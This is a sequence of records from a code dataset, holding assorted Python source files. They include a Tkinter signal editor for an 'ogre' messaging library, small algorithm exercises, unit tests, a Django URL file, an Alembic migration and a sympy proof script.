\"sigNo\":\n continue\n attr = getattr(struct, attr_name)\n\n value_label = tkinter.Label(frame, text=attr_name + \":\", bg=FRAME_COLOR)\n value_label.grid(row=j, column=0, sticky=tkinter.E)\n\n if isinstance(attr, ogre.Struct):\n item = Struct(frame, attr_name, attr, j)\n elif isinstance(attr, ogre.Array):\n item = Array(frame, attr_name, attr, j)\n elif isinstance(attr, int):\n item = Int(frame, attr_name, attr, j)\n else:\n print('leaf', j)\n self.tree.append(item)\n j = j + 1\n\n def value(self):\n for item in self.tree:\n setattr(self.struct, item.name, item.value())\n return self.struct\n\n def as_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_string(prefix + \".\" + item.name)\n return s\n\n def as_verify_string(self, prefix):\n s = \"\"\n for item in 
self.tree:\n s = s + item.as_verify_string(prefix + \".\" + item.name)\n return s\n\n\n# ----------------------------------------------------------------\nclass HeaderFrame(tkinter.Frame):\n \"\"\"\n Title frame\n \"\"\"\n def __init__(self, parent, title):\n tkinter.Frame.__init__(self, parent, bg=HEADER_COLOR)\n self.pack(fill=tkinter.X)\n myfont = tkinter.font.Font(family=\"Helvetica\", size=12, weight='bold')\n label = tkinter.Label(self, text=title, bg=HEADER_COLOR,\n fg=\"white\", font=myfont)\n label.pack(padx=2, pady=2)\n\n\n# ----------------------------------------------------------------\nclass SignalListFrame(tkinter.Frame):\n \"\"\"\n Signal list frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Signals\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n\n # List frame\n self.list_frame = tkinter.Listbox(content, \n yscrollcommand=sby.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.list_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n self.list_frame.bind(\"<Double-Button-1>\", self.do_double_click)\n sby.config(command=self.list_frame.yview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n open_button = tkinter.Button(button_frame, text=\"Open\",\n bg=BUTTON_COLOR,\n command=self.app.do_open)\n open_button.pack(padx=4, pady=4)\n\n def do_double_click(self, e):\n for index in self.list_frame.curselection():\n self.app.do_open_send_signal(int(index))\n\n def add(self, sig_name):\n self.list_frame.insert(tkinter.END, sig_name)\n\n\n# ----------------------------------------------------------------\nclass ReceiveFrame(tkinter.Frame):\n \"\"\"\n Received signals frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Receive\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n\n # List frame\n self.list_frame = tkinter.Listbox(content,\n yscrollcommand=sby.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.list_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n self.list_frame.bind(\"<Double-Button-1>\", self.do_double_click)\n sby.config(command=self.list_frame.yview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n receive_button = tkinter.Button(button_frame, text=\"Receive\",\n bg=BUTTON_COLOR,\n command=self.app.do_receive)\n receive_button.pack(padx=4, pady=4)\n\n def do_double_click(self, e):\n for index in self.list_frame.curselection():\n self.app.do_open_rec_signal(int(index))\n\n def add(self, sig, var):\n signal = \"%s: %s.%s\" % (var, sig.__class__.__module__, sig.__class__.__name__)\n self.list_frame.insert(tkinter.END, signal)\n\n# 
----------------------------------------------------------------\nclass LogFrame(tkinter.Frame):\n \"\"\"\n Script window\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Script\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n sbx = tkinter.Scrollbar(content, orient=tkinter.HORIZONTAL)\n sbx.grid(row=1, column=0, sticky=tkinter.W + tkinter.E)\n\n # List frame\n self.log_frame = tkinter.Text(content, wrap=tkinter.NONE,\n yscrollcommand=sby.set,\n xscrollcommand=sbx.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.log_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n sby.config(command=self.log_frame.yview)\n sbx.config(command=self.log_frame.xview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n save_button = tkinter.Button(button_frame, text=\"Save\",\n bg=BUTTON_COLOR,\n command=self.app.do_save_script)\n save_button.pack(padx=4, pady=4)\n\n def get_log(self):\n return self.log_frame.get(1.0, tkinter.END)\n \n def log_string(self, s):\n self.log_frame.insert(tkinter.END, s + \"\\n\")\n\n def log_connect(self, url, proc):\n s = \"\\n\"\n s += \"url = '%s'\\n\" % url\n s += \"proc = ogre.Process(url, '%s')\\n\" % (proc)\n self.log_frame.insert(tkinter.END, s)\n\n def log_disconnect(self):\n s = \"\\n\"\n s += \"proc.close()\\n\"\n self.log_frame.insert(tkinter.END, s)\n\n def log_import(self, mod):\n s = \"\\n\"\n s += \"import %s\\n\" % (mod)\n self.log_frame.insert(tkinter.END, s)\n\n def log_send(self, sig, tree):\n s = \"\\n\"\n s += \"%s = %s.%s()\\n\" % (tree.name, \n sig.__class__.__module__,\n sig.__class__.__name__)\n s += tree.as_string(tree.name)\n s += \"proc.send(%s)\\n\" % tree.name\n self.log_frame.insert(tkinter.END, s)\n\n def log_receive(self, var):\n s = \"\\n\"\n s += \"%s = proc.receive()\\n\" % (var)\n self.log_frame.insert(tkinter.END, s)\n\n def log_verify(self, sig, tree):\n s = \"\\n\"\n s += tree.as_verify_string(tree.name)\n self.log_frame.insert(tkinter.END, s)\n\n\n# ----------------------------------------------------------------\nclass ConnectionFrame(tkinter.Frame):\n \"\"\"\n Connection frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Connection\")\n\n # Login frame\n login_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n login_frame.pack(fill=tkinter.BOTH)\n\n url_label = tkinter.Label(login_frame, bg=FRAME_COLOR, text=\"URL:\")\n url_label.grid(row=0, column=0, sticky=tkinter.E, padx=4, pady=4)\n\n self.url_entry = tkinter.Entry(login_frame, bg=FIELD_COLOR, width=32)\n self.url_entry.insert(0, \"tcp://172.17.226.207:22001\")\n self.url_entry.grid(row=0, column=1, sticky=tkinter.W, padx=4, pady=4)\n\n proc_label = tkinter.Label(login_frame, bg=FRAME_COLOR, text=\"Process:\")\n proc_label.grid(row=1, column=0, sticky=tkinter.E, padx=4, pady=4)\n\n self.proc_entry = tkinter.Entry(login_frame, bg=FIELD_COLOR)\n self.proc_entry.insert(0, \"ogre_echo\")\n self.proc_entry.grid(row=1, column=1, sticky=tkinter.W, padx=4, pady=4)\n\n # Button frame\n 
button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n connect_button = tkinter.Button(button_frame, text=\"Connect\",\n bg=BUTTON_COLOR,\n command=self.do_connect)\n connect_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n disconn_button = tkinter.Button(button_frame, text=\"Disconnect\",\n bg=BUTTON_COLOR,\n command=self.app.do_disconnect)\n disconn_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n quit_button = tkinter.Button(button_frame, text=\"Quit\",\n bg=BUTTON_COLOR,\n command=self.quit)\n quit_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n\n def do_connect(self):\n url = self.url_entry.get()\n proc = self.proc_entry.get()\n self.app.do_connect(url, proc)\n\n\n# ----------------------------------------------------------------\nclass SignalFrame(tkinter.Frame):\n \"\"\"\n Signal frame.\n \"\"\"\n def __init__(self, app, parent, sig, var, rx=False):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n self.sig = sig\n self.parent = parent\n parent.protocol(\"WM_DELETE_WINDOW\", self.do_close)\n\n HeaderFrame(self, sig.__class__.__name__)\n\n # Sig frame\n sig_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n sig_frame.pack(fill=tkinter.BOTH, expand=1)\n self.tree = Struct(sig_frame, var, sig, 0)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n\n if rx:\n verify_button = tkinter.Button(button_frame, text=\"Verify\",\n bg=BUTTON_COLOR,\n command=self.do_verify)\n verify_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n else:\n send_button = tkinter.Button(button_frame, text=\"Send\",\n bg=BUTTON_COLOR,\n command=self.do_send)\n send_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n close_button = tkinter.Button(button_frame, text=\"Close\",\n bg=BUTTON_COLOR,\n command=self.do_close)\n close_button.pack(side=tkinter.LEFT, padx=4, pady=4)\n\n def do_close(self):\n self.app.close_signal_window(self.parent)\n \n def do_send(self):\n self.app.do_send(self.sig, self.tree)\n\n def do_verify(self):\n self.app.do_verify(self.sig, self.tree)\n\n\n# ----------------------------------------------------------------\nclass StatusBarFrame(tkinter.Frame):\n\n def __init__(self, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR)\n self.label = tkinter.Label(self, bd=1, relief=tkinter.SUNKEN,\n anchor=tkinter.W)\n self.label.pack(fill=tkinter.X)\n\n def error(self, txt):\n self.label['bg'] = \"red\"\n self.label.config(text=txt)\n self.label.update_idletasks()\n\n def info(self, txt=None):\n self.label['bg'] = \"lightgreen\"\n if txt is None:\n txt = \"\"\n self.label.config(text=txt)\n self.label.update_idletasks()\n\n\n# ----------------------------------------------------------------\nclass App:\n \"\"\"Application.\n\n \"\"\"\n unique_sig = 0\n\n def __init__(self, root):\n self.root = root\n self.gw = None\n self.pid = 0\n self.sig_list = []\n self.receive_list = []\n\n # Top level structure frames\n top_frame = tkinter.Frame(root, bg=BG_COLOR)\n top_frame.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n top_frame.grid_rowconfigure(0, weight=1)\n top_frame.grid_rowconfigure(1, weight=1)\n top_frame.grid_rowconfigure(2, weight=0)\n top_frame.grid_columnconfigure(0, weight=1)\n top_frame.grid_columnconfigure(1, weight=1)\n\n # Application frames\n self.sig_frame = SignalListFrame(self, top_frame)\n self.log_frame = LogFrame(self, top_frame)\n self.rec_frame = ReceiveFrame(self, top_frame)\n self.con_frame = ConnectionFrame(self, top_frame)\n 
self.status = StatusBarFrame(top_frame)\n\n        # Layout\n        self.sig_frame.grid(row=0, column=0, sticky=STICKY_ALL)\n        self.log_frame.grid(row=1, column=0, sticky=STICKY_ALL)\n        self.rec_frame.grid(row=0, column=1, sticky=STICKY_ALL)\n        self.con_frame.grid(row=1, column=1, sticky=tkinter.S + tkinter.W + tkinter.E)\n        self.status.grid(row=2, column=0, columnspan=2,\n                         sticky=tkinter.S + tkinter.W + tkinter.E)\n\n        # Other inits\n        #self.status.info(\"Disconnected\")\n        self.log_frame.log_string(\"import ogre\")\n\n\n    def load_signal_file(self, path):\n        \"\"\"Load signals from a python signal definition file.\n\n        Instantiate each signal and insert the signal in the sig_list\n        list.\n        \"\"\"\n        self.status.info()\n        try:\n            file_name = os.path.basename(path)\n            module_name, ext = os.path.splitext(file_name)\n            with open(path) as sig_file:\n                module = imp.load_source(module_name, path, sig_file)\n        except Exception:\n            self.status.error(\"Error reading '%s' signal file\" % file_name)\n            return\n\n        for attr, obj in module.__dict__.items():\n            if isinstance(obj, type) and issubclass(obj, ogre.Signal):\n                sig = obj()\n                self.sig_list.append((attr, sig))\n                self.sig_frame.add(\"%s.%s\" % (module_name, attr))\n\n        self.log_frame.log_import(module_name)\n\n    def close_signal_window(self, closed_window):\n        \"\"\"SignalFrame window closing.\n\n        Called when a SignalFrame window is about to be closed. Destroy\n        the window and remove the window's reference in the receive_list\n        (if any).\n        \"\"\"\n        for i, asig in enumerate(self.receive_list):\n            (sig, var, window) = asig\n            if window is closed_window:\n                self.receive_list[i] = (sig, var, None)\n        closed_window.destroy()\n\n        \n    # Command handlers\n\n    def do_open(self):\n        self.status.info()\n        file_name = askopenfilename(filetypes=[(\"signal descriptor\", \".py\")],\n                                    title=\"Open Signal File\",\n                                    parent=self.root)\n        if file_name:\n            self.load_signal_file(file_name)\n\n    def do_open_send_signal(self, index):\n        self.status.info()\n        name, sig = self.sig_list[index]\n\n        self.unique_sig += 1\n        var = \"sig%d\" % self.unique_sig\n\n        window = tkinter.Toplevel()\n        window.title(var)\n        sig_frame = SignalFrame(self, window, copy.deepcopy(sig), var)\n        sig_frame.pack(fill=tkinter.BOTH, expand=1)\n\n    def do_open_rec_signal(self, index):\n        self.status.info()\n        sig, var, window = self.receive_list[index]\n\n        if window:\n            window.lift()\n        else:\n            window = tkinter.Toplevel()\n            window.title(var)\n            sig_frame = SignalFrame(self, window, sig, var, rx=True)\n            sig_frame.pack(fill=tkinter.BOTH, expand=1)\n            self.receive_list[index] = (sig, var, window)\n\n    def do_connect(self, url, proc):\n        if self.gw:\n            self.status.error(\"Already connected\")\n            return\n\n        try:\n            self.gw = ogre.create(url, \"siged\")\n            self.gw.hunt(proc)\n            sig = self.gw.receive(timeout=1.0)\n            if sig is None:\n                self.gw.close()\n                self.gw = None\n                self.status.error(\"Can't find %s\" % proc)\n                return\n            self.pid = sig.sender()\n            self.log_frame.log_connect(url, proc)\n            self.status.info(\"Connected to %s\" % proc)\n        except Exception as e:\n            self.status.error(\"Connect error: %s\" % e)\n\n\n    def do_disconnect(self):\n        try:\n            if self.gw:\n                self.gw.close()\n                self.log_frame.log_disconnect()\n                self.status.info(\"Disconnected\")\n        except Exception as e:\n            self.status.error(\"Disconnect error %s\" % e)\n        self.gw = None\n\n\n    def do_send(self, old_sig, tree):\n        if not self.gw:\n            self.status.error(\"Not connected\")\n            return\n\n        try:\n            self.log_frame.log_send(old_sig, tree)\n            sig = tree.value()\n            self.gw.send(sig, self.pid)\n            self.status.info(\"Sent %s\" % 
sig.__class__.__name__)\n        except Exception as e:\n            self.status.error(\"Send error %s\" % e)\n\n\n    def do_verify(self, sig, tree):\n        self.status.info()\n        self.log_frame.log_verify(sig, tree)\n\n\n    def do_receive(self):\n        if not self.gw:\n            self.status.error(\"Not connected\")\n            return\n\n        self.status.info(\"\")\n        try:\n            while True:\n                sig = self.gw.receive(timeout=0.1)\n                if sig is None:\n                    return\n\n                self.unique_sig += 1\n                var = \"sig%d\" % self.unique_sig\n\n                self.receive_list.append((sig, var, None))\n                self.rec_frame.add(sig, var)\n                self.log_frame.log_receive(var)\n        except Exception as e:\n            self.status.error(\"Receive error %s\" % e)\n\n\n    def do_save_script(self):\n        self.status.info()\n        file_name = asksaveasfilename(filetypes=[(\"python script\", \".py\")],\n                                      title=\"Save Script\",\n                                      parent=self.root)\n        if file_name:\n            with open(file_name, \"w\") as log_file:\n                log_file.write(self.log_frame.get_log())\n    \n\n# ----------------------------------------------------------------\ndef main(args):\n    \"\"\"Main entry point.\n\n    Create the main window and start the main loop.\n\n    Parameters:\n        args -- list of signal description files to load\n    \"\"\"\n    root = tkinter.Tk()\n    root.title(\"OGRE Editor\")\n    app = App(root)\n    for path in args:\n        app.load_signal_file(path)\n    root.mainloop()\n\n\n# ---------------------------------------------------------------- \nif __name__ == '__main__':\n    main(sys.argv[1:])\n\n\n# End of file\n","repo_name":"CheukLeung/FlogReporter","sub_path":"work/jobs/Ruby_test/workspace/pyogre3/examples/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":23231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32659729569","text":"import sys\n\n# List recording the employees' enter/leave events\nvisit_state = []\n# Marks each employee True/False depending on whether they are in the office\nvisit_dict = {}\n\n# Number of entry/exit events n\nn = int(sys.stdin.readline())\n\n# Process all n entry/exit events\nfor i in range(n) :\n    # Read the name and the event state\n    name, state = sys.stdin.readline().split()\n    # Record the employee name and enter/leave state\n    visit_state.append((name,state))\n    # Dict holding each employee's actual presence state\n    if name not in visit_dict :\n        visit_dict[name] = False \n\nfor i in range(len(visit_state)) :\n    # 'enter' means clock-in and 'leave' means clock-out\n    if visit_state[i][1] == 'enter' :\n        visit_dict[visit_state[i][0]] = True\n    else :\n        visit_dict[visit_state[i][0]] = False\n\n\n# Sort the names of the people still in the office in reverse lexicographic order\nsort_state = sorted(visit_dict.items(), reverse=True)\n\n# Output\nfor i in range(len(sort_state)) :\n    if sort_state[i][1] :\n        print(sort_state[i][0])\n","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/해시/7785_회사에있는사람.py","file_name":"7785_회사에있는사람.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71895486866","text":"from src.parameters import *\n\n\nclass Board(object):\n    def __init__(self):\n        self.slots = 30\n        self.white_pieces_on = 15\n        self.black_pieces_on = 15\n        self.white_pieces_off = 0\n        self.black_pieces_off = 0\n        self.white_pieces_safe = 0\n        self.black_pieces_safe = 0\n        self.state = dict()\n        self.state[1] = 2\n\n    def move_piece(self, color, start_location, end_location):\n        return 0\n\n    @property\n    def game_complete(self):\n        if self.white_pieces_safe:\n            print(\"white wins\")\n            return True\n        elif self.black_pieces_safe:\n            print(\"black wins\")\n            return True\n        else:\n            return False\n\n    def print(self):\n        
print(self.state)\n","repo_name":"bugo99iot/deep_gammon","sub_path":"src/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22027052710","text":"\"\"\"\nModule for testing ImgProcessor\n\nAuthors: Jorn Tuyls\n\"\"\"\n\nimport unittest\nimport numpy as np\n\nimport sys\nimport logging\n\nfrom cvx.img_processor import ImgProcessor\n\nlogger = logging.getLogger('cvx')\nlogger.addHandler(logging.StreamHandler(sys.stdout))\nlogger.setLevel(logging.DEBUG)\n\n\nclass TestImgProcessor(unittest.TestCase):\n\n    def test_scale_transpose(self):\n        logger.debug(\"Test scale and transpose\")\n        # NCHW\n        imgs = np.transpose(\n            np.reshape(np.array([\n                [[10,10],\n                [50,10]],\n                [[30,50],\n                [10,90]],\n                [[20, 0],\n                [0, 0]]\n            ]), (1,3,2,2)),\n            (0,2,3,1)\n        ) # NCHW -> NHWC\n\n        img_processor = ImgProcessor('scale-2.0__transpose-2,0,1')\n        res = img_processor.execute(imgs)\n\n        expected_outpt = np.transpose(2.0 * imgs, (0,3,1,2)) # NHWC -> NCHW\n        \n        np.testing.assert_array_equal(res, expected_outpt)\n\n    def test_crop_transpose(self):\n        logger.debug(\"Test crop and transpose\")\n        # NCHW\n        imgs = np.transpose(\n            np.reshape(np.array([\n                [[10,10,0],\n                [50,10,0],\n                [0,0,0]],\n                [[30,50,0],\n                [10,90,0],\n                [0,0,0]],\n                [[20,0,0],\n                [0,0,0],\n                [0,0,0]]\n            ]), (1,3,3,3)),\n            (0,2,3,1)\n        )\n\n        img_processor = ImgProcessor('crop-0,2-0,2-1,3__transpose-2,0,1')\n        res = img_processor.execute(imgs)\n\n        expected_outpt = np.reshape(np.array([\n            [[30,50],\n            [10,90]],\n            [[20, 0],\n            [0, 0]]\n        ]), (1,2,2,2)) # NCHW\n        \n        np.testing.assert_array_equal(res, expected_outpt)\n    \n\n\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"seokNULL/pim-compiler","sub_path":"lib/cvx/tests/integration/test_img_processor.py","file_name":"test_img_processor.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17882050620","text":"from django.urls import path\nfrom .views import crawlStatusView,autoComplete,stateComparison\n#GenericReportDetailAPIView,GenericReportUpdateAPIView,GenericReportCreateAPIView,GenericReportListAPIView\nfrom . 
import views\nurlpatterns = [ \n    path('crawlStatus/', crawlStatusView.as_view()),\n    path('autoComplete/', autoComplete.as_view()),\n    path('stateComparison/', stateComparison.as_view()),\n    path('', views.index, name='index'),\n    path('cool_chart/',\n        views.my_cool_chart_view,\n        name='my-cool-chart'\n        ),\n    ]\n\n","repo_name":"rajesh241/libtechDjango","sub_path":"src/nrega/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13934685302","text":"# -*- coding: utf-8 -*-\n\n\"\"\" This file is part of OctoPNP\n\n    This is a test script to execute the imageprocessing-steps independent from the main software\n    and particularly without a running printer.\n\n    Main author: Florens Wasserfall <wasserfall@kalanka.de>\n\"\"\"\n\nimport time\nimport ImageProcessing\n\nim = ImageProcessing.ImageProcessing(15.0, 120, 120)\n\n\nstart_time = time.time()\n\nim.SetInteractive(True)\n# im.locatePartInBox(\"../utils/testimages/head_atmega_SO8.png\", False)\n# im.locatePartInBox(\"../utils/testimages/head_atmega_SO8_2.png\", False)\n# print im.getPartOrientation(\"../utils/testimages/bed_atmega_SO8_rotated.png\", 30)\nim.getPartOrientation(\"../utils/testimages/orientation_bed_atmega_SO8_green.png\", 55.65)\n# im.getPartPosition(\"../utils/testimages/orientation_bed_atmega_SO8_green.png\", 55.65)\n# im.getPartOrientation(\"../utils/testimages/bed_resistor_1206.png\", 55.65)\n\nend_time = time.time()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"platsch/OctoPNP","sub_path":"octoprint_OctoPNP/ImageProcessingCaller.py","file_name":"ImageProcessingCaller.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"5086817996","text":"def print_formatted(number):\n    for num in range(1,number+1):\n        \n        print(num, octal(num), hexadecimal(num), binario(num))\n    \n    \ndef binario(num)->str:\n    lista = [2**n for n in range(num) if 2**n <= num ]\n    \n    for i in reversed(lista):\n        if i <= num:\n            num = num-i\n            lista[lista.index(i)] = 1\n        else:\n            lista[lista.index(i)] = 0\n    \n    binario = ''.join(reversed([str(num) for num in lista]))\n    return binario\n\n    \ndef octal(num)->str:\n    lista = []\n    while num > 0:\n        division = num//8\n        multiplicacion = division * 8\n        resta = num - multiplicacion\n        lista.insert(0,str(resta))\n        num = division\n    octal = ''.join(lista)\n    return octal\n\n    \ndef hexadecimal(num)->str:\n    lista = []\n    dic = {0:0, 1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9,\n           10:\"A\", 11:\"B\", 12:\"C\", 13:\"D\", 14:\"E\", 15:\"F\"}\n    while num > 0:\n        division = num//16\n        multiplicacion = division * 16\n        resta = num - multiplicacion\n        lista.insert(0,resta)\n        num = division\n    lista = [str(dic[n]) for n in lista]\n    hexadecimal = ''.join(lista)\n    return hexadecimal\n\nif __name__ == '__main__':\n    n = int(input())\n    print_formatted(n)\n","repo_name":"dperezc21/ejercicios","sub_path":"ejercicio/conversión de decimal.py","file_name":"conversión de decimal.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8082060368","text":"\"\"\"empty message\n\nRevision ID: c61fb27ebf1f\nRevises: d594838bcd76\nCreate Date: 2023-08-03 23:23:08.148550\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c61fb27ebf1f'\ndown_revision = 
'd594838bcd76'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('cart', schema=None) as batch_op:\n batch_op.create_foreign_key('fkpid', 'prod', ['Pid'], ['id'])\n batch_op.drop_column('no')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('cart', schema=None) as batch_op:\n batch_op.add_column(sa.Column('no', sa.INTEGER(), nullable=False))\n batch_op.drop_constraint('fkpid', type_='foreignkey')\n\n # ### end Alembic commands ###\n","repo_name":"paulose610/greenvent","sub_path":"greenvent/migrations/versions/c61fb27ebf1f_.py","file_name":"c61fb27ebf1f_.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1868418673","text":"from unittest import TestCase\nfrom unittest.mock import patch\nfrom h1st import Graph, Action, Model\nfrom h1st.schema.testing import setup_schema_tests\n\n\nclass SchemaTestingTestCase(TestCase):\n @patch('h1st.schema.testing.ValidationSchema')\n def test_test_case_generator(self, mock_graph_schema):\n\n mock_graph_schema.load.return_value = {}\n\n class MyTestModel(Model):\n pass\n\n g = Graph()\n g.start()\n g.add(Model())\n g.end()\n\n scopes = {}\n setup_schema_tests(g, scopes)\n self.assertEqual({}, scopes)\n\n mock_graph_schema.load.return_value = {\n 'Model': {\n 'test_input': {\n 'test': 1\n },\n 'expected_output': {\n 'schema': {\n 'type': dict,\n },\n }\n }\n }\n setup_schema_tests(g, scopes)\n self.assertTrue('Graph_Model_output' in scopes)\n\n @patch('h1st.schema.testing.ValidationSchema')\n def test_test_case_runner(self, mock_graph_schema):\n class MyTestModel(Model):\n def predict(self, input_data):\n return {\n \"result\": sum(input_data['inputs'])\n }\n\n g = Graph()\n g.start()\n g.add(Model())\n g.end()\n\n test_data = []\n schema = {\n 'Model': {\n 'test_input': {},\n 'expected_output': {\n 'schema': {\n 'type': dict,\n }\n }\n }\n }\n\n mock_graph_schema.load.return_value = schema\n g._schema = schema\n\n scopes = {}\n setup_schema_tests(g, scopes)\n test_class = scopes['Graph_Model_output']\n\n result = test_class('runTest')()\n self.assertEqual(0, len(result.errors))\n\n schema['Model']['test_input']['inputs'] = [1, 2, 3]\n result = test_class('runTest')()\n self.assertEqual(0, len(result.errors))\n\n schema['Model']['expected_output']['schema']['type'] = list\n result = test_class('runTest')()\n self.assertTrue(\"Expects list, receives dict\" in result.failures[0][1])\n","repo_name":"thangtranth/h1st","sub_path":"h1st/tests/core/test_schema_testcase.py","file_name":"test_schema_testcase.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14272794091","text":"\nfrom sympy.core.relational import Unequal\n\nfrom axiom.utility import plausible\nfrom axiom.utility import check\nfrom sympy import Symbol, Slice\nfrom sympy.stats.symbolic_probability import Probability as P\nfrom axiom.statistics import bayes\n\nfrom sympy.stats.rv import pspace\nfrom sympy.core.numbers import oo\n\n\n# given: P(x, y) != 0\n# imply: P(x[:t], y[:t]) != 0\n@plausible\ndef apply(given, indices):\n assert given.is_Unequality\n assert given.lhs.is_Probability\n assert given.rhs.is_zero\n \n eqs = given.lhs.arg\n assert eqs.is_And\n \n args = []\n for eq, t in zip(eqs.args, 
indices): \n x, _x = eq.args\n assert _x == pspace(x).symbol\n args.append(x[t])\n \n return Unequal(P(*args), 0, given=given)\n\n\n@check\ndef prove(Eq):\n n = Symbol.n(integer=True, domain=[2, oo])\n x = Symbol.x(real=True, shape=(n,), random=True)\n y = Symbol.y(real=True, shape=(n,), random=True)\n t = Symbol.t(integer=True, domain=[1, n - 1])\n \n Eq << apply(Unequal(P(x, y), 0), Slice[:t, :t])\n \n Eq << Eq[0].this.lhs.arg.args[-1].bisect(Slice[:t])\n \n Eq << Eq[-1].this.lhs.arg.args[0].bisect(Slice[:t])\n \n Eq << bayes.inequality.et.apply(Eq[-1], wrt={x[:t], y[:t]}).split()\n \n \nif __name__ == '__main__':\n prove(__file__)\n","repo_name":"cosmosZhou/sagemath","sub_path":"axiom/statistics/bayes/inequality/inequality/joint_slice.py","file_name":"joint_slice.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33264568066","text":"# IPython log file\n\nimport subprocess as s\nimport json\n\n\nmydict = dict(\n one='foo',\n two='bar',\n three='baz')\n\n\nd = json.dumps(mydict)\nd = d.encode('utf-8')\n\n\nout = s.check_output(\"jq '.'\", input=d, shell=True)\n\n\nout = out.decode('utf-8')\nout = 